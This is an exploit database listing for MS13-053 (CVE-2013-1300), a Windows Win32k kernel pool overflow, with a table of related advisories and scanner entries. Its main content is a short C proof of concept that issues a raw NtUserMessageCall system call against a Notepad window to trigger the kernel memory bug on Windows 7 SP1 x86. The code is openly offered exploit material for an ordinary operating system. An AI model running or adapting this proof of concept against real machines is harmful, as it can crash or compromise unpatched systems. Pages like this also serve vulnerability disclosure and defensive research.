MS13-053 Win32k Memory Allocation Vulnerability

🗓️ 12 Sep 2013 00:00:00Reported by 0xbigbanType

zdt🔗 0day.today👁 52 Views

Memory Allocation Vulnerability Exploit in Win32

Reporter	Title	Published	Views	Family All 19
0day.today	Windows NTUserMessageCall Win32k Kernel Pool Overflow (Schlamperei)	6 May 201400:00	–	zdt
GithubExploit	Exploit for CVE-2013-1300	9 Sep 201314:20	–	githubexploit
Circl	CVE-2013-1300	6 May 201400:00	–	circl
CVE	CVE-2013-1300	10 Jul 201301:00	–	cve
Cvelist	CVE-2013-1300	10 Jul 201301:00	–	cvelist
Exploit DB	Microsoft Windows - NTUserMessageCall Win32k Kernel Pool Overflow 'schlamperei.x86.dll' (MS13-053) (Metasploit)	6 May 201400:00	–	exploitdb
Metasploit	Windows NTUserMessageCall Win32k Kernel Pool Overflow (Schlamperei)	12 Mar 201410:25	–	metasploit
NVD	CVE-2013-1300	10 Jul 201303:46	–	nvd
OpenVAS	Microsoft Windows Kernel-Mode Drivers Remote Code Execution Vulnerabilities (2850851)	10 Jul 201300:00	–	openvas
OpenVAS	MS Windows Kernel-Mode Drivers Remote Code Execution Vulnerabilities (2850851)	10 Jul 201300:00	–	openvas

/*
	more detials:
	https://labs.mwrinfosecurity.com/blog/2013/09/06/mwr-labs-pwn2own-2013-write-up-kernel-exploit/
	this poc is written by 0xBigBan
*/
#include <windows.h>
 
#define __NtUserMessageCall 0x11ea //on win7 sp1 x86

void SystemCall(DWORD ApiNumber, ...) {
	__asm{
		lea edx, [ebp+0x0c]
		mov eax, ApiNumber
		int 0x2e
		leave
		ret
	}
}
 
int main() {
	//you should have open a txt file with notepad
	HWND handle = FindWindow(NULL,"a.txt - notepad");
	void* ptr = malloc(sizeof(int)*2);
	
	SystemCall(__NtUserMessageCall,
				handle,
				WM_GETTEXT,
				0x8,	//buffer size
				ptr,	//user mode buffer
				0x0,
				0x2b3,
				0x2);	//ASCII boolean/flag
}

#  0day.today [2018-02-18]  #

12 Sep 2013 00:00Current

0.7Low risk

Vulners AI Score0.7

EPSS0.27221

memory allocation; win32k; kernel exploit; pwn2own 2013; user mode buffer; ascii boolean.